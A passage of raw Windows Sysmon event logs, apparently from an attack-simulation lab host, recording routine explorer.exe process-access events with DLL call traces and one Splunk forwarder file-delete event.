tem32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001695163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\system32\explorerframe.dll+5dfed|C:\Windows\system32\explorerframe.dll+5e17a|C:\Windows\system32\explorerframe.dll+442f1|C:\Windows\system32\explorerframe.dll+3c8aa|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f 10341000x80000000000000001695162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\system32\explorerframe.dll+5dfed|C:\Windows\system32\explorerframe.dll+5e17a|C:\Windows\system32\explorerframe.dll+442f1|C:\Windows\system32\explorerframe.dll+3c8aa|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f 10341000x80000000000000001695161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\system32\explorerframe.dll+5dfed|C:\Windows\system32\explorerframe.dll+5e17a|C:\Windows\system32\explorerframe.dll+442f1|C:\Windows\system32\explorerframe.dll+3c8aa|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470 10341000x80000000000000001695160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.317{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\system32\explorerframe.dll+5dfed|C:\Windows\system32\explorerframe.dll+5e17a|C:\Windows\system32\explorerframe.dll+442f1|C:\Windows\system32\explorerframe.dll+3c8aa|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02 10341000x80000000000000001695159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+56e45|C:\Windows\system32\explorerframe.dll+3c86c|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56e24|C:\Windows\system32\explorerframe.dll+3c86c|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56ef0|C:\Windows\System32\SHELL32.dll+56df9|C:\Windows\system32\explorerframe.dll+3c86c|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56edc|C:\Windows\System32\SHELL32.dll+56df9|C:\Windows\system32\explorerframe.dll+3c86c|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56edc|C:\Windows\System32\SHELL32.dll+56df9|C:\Windows\system32\explorerframe.dll+3c86c|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+3c85f|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+3c85f|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+3c85f|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.301{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+3c85f|C:\Windows\system32\explorerframe.dll+43d9d|C:\Windows\system32\explorerframe.dll+5d950|C:\Windows\system32\explorerframe.dll+1a470|C:\Windows\system32\explorerframe.dll+19d02|C:\Windows\system32\explorerframe.dll+19cb2|C:\Windows\system32\explorerframe.dll+281b6|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001695150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.270{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57BB992C130FFA8F81C6A5471C8D3BCD,SHA256=BBD28BE721A523247A7FBA37AD4178E760AE552A2C64A90B5B680F92CECE7498,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.252{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764 10341000x80000000000000001695148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.250{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\system32\explorerframe.dll+799b9|C:\Windows\system32\explorerframe.dll+3b067|C:\Windows\system32\explorerframe.dll+1cf04|C:\Windows\system32\explorerframe.dll+1cfc0 10341000x80000000000000001695147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.249{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\system32\explorerframe.dll+799b9|C:\Windows\system32\explorerframe.dll+3b067|C:\Windows\system32\explorerframe.dll+1cf04|C:\Windows\system32\explorerframe.dll+1cfc0 10341000x80000000000000001695146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.249{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f 10341000x80000000000000001695145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.249{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\system32\explorerframe.dll+799b9 10341000x80000000000000001695144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.192{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.192{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.176{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+3d9ff|C:\Windows\System32\SHELL32.dll+3c95e|C:\Windows\System32\SHELL32.dll+3c1f0|C:\Windows\System32\SHELL32.dll+3aa7f|C:\Windows\System32\SHCORE.dll+333c9|C:\Windows\system32\explorerframe.dll+581c6|C:\Windows\system32\explorerframe.dll+3e2af|C:\Windows\system32\explorerframe.dll+3dbf8|C:\Windows\system32\explorerframe.dll+651a|C:\Windows\system32\explorerframe.dll+3bbe4|C:\Windows\system32\explorerframe.dll+3c041|C:\Windows\system32\explorerframe.dll+3b9bc|C:\Windows\system32\explorerframe.dll+3a347|C:\Windows\system32\explorerframe.dll+3cb5f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7 10341000x80000000000000001695141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 